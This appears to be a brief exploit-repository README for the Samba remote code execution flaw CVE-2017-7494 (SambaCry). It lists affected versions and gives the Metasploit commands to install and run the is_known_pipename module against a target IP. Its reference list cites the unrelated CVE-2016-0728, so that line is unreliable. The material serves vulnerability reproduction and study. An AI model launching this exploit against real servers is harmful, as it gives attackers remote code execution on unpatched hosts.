（CVE-2017-7494）Linux Samba 远程代码执行

CVE-2017-7494

Vulnerability reference:

• CVE-2016-0728
• exp-db

Samba

Samba 3.5.0-4.6.4/4.5.10/4.4.14

Usage

is_known_pipename.rb 放在 /usr/share/metasploit-framework/modules/exploits/linux/samba/ 目录下

msf > use exploit/linux/samba/is_known_pipename

set RHOST 192.168.220.140

run

References

• Samba远程代码执行漏洞(CVE-2017-7494)
• 【漏洞分析】Samba远程代码执行漏洞(CVE-2017-7494)-SambaCry分析报告
• Msf复现Samba远程代码执行漏洞

https://github.com/SecWiki/linux-kernel-exploits/tree/master/2017/CVE-2017-7494